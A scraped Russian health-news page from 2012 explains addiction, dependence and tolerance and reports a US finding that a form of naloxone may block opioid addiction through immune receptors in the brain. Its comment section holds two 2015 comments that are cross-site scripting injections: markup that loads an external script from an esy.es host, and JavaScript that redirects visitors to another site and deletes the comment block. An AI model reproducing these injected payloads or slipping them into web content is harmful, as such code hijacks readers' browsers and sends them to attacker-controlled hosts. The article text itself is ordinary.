Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Наркоманов больше не буде...  >>  Наркоманов больше не будет
 
Обратная связь
 

Наркоманов больше не будет

Размер шрифта
01 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Препарат налоксон позволяет бороться с наркоманией, не вызывая повреждение головного мозга.

наркомания

Что такое наркомания

Наркомания – это заболевание, которое характеризуется патологическим влечением к различным психоактивным веществам, развитием психической и физической зависимости и толерантности к ним.

Психическая зависимость – это болезненное стремление принимать наркотические вещества для достижения психического комфорта. Она возникает при систематическом употреблении наркотиков, но может появиться и после однократного приема. Психическая зависимость является самым сильным психологическим фактором, способствующим регулярному приему наркотиков или других психоактивных средств.

Физическая зависимость – это состояние перестройки организма в ответ на хроническое употребление наркотических веществ. Она проявляется выраженными психическими и соматическими нарушениями при прекращении приема наркотиков (абстинентный синдром), которые прекращаются при новом введении того же наркотика.

Толерантность – это состояние адаптации к наркотическим веществам, когда для достижения прежнего эффекта требуется более высокая доза препарата.

Что такое налоксон

Налоксон – это антагонист опиоидных рецепторов, который используется в качестве противоядия при отравлении наркотиками. Налоксон применяют главным образом при острой интоксикации наркотическими обезболивающими. При введении налоксона у наркоманов наблюдается  абстинентный синдром, чем иногда пользуются для выявления заболевания.

Суть исследования

Американские ученые обнаружили, что одну из разновидностей налоксона можно использовать для лечения наркомании, поскольку она блокирует специфические рецепторы иммунной системы. С этими рецепторами обычно связываются наркотики, например, морфин, что приводит к развитию зависимости.

Результаты исследования свидетельствуют о том, что зависимость можно заблокировать на уровне иммунной системы головного мозга, не нарушая его электрическую активность. В развитии зависимости играет роль не только центральная нервная система, но и иммунная система. Однако новые данные свидетельствуют о том, что справиться с тягой к наркотикам можно путем блокировки только иммунного ответа.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Куришь марихуану – будет рак яичек   26 июня – Всемирный день борьбы с наркоманией   Продукты-наркотики. Еда, которая вызывает зависимость   Сахар делает с мозгом то же, что кокаин  
01 октября 2012Куришь марихуану – будет рак яичек! 28 сентября 2012Наркоманов больше не будет!
 
06 мая 2011Контрольная от наркоконтроля 28 июня 2011Добрым словом можно одолеть наркоманию
 

Слайдшоу

1
20 признаков того, что у ваших близких зависимость
Признаки зависимости от еды
От чего умер Робин Уильямс?

Тесты

Насколько у вас велик риск заболеть ВИЧ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.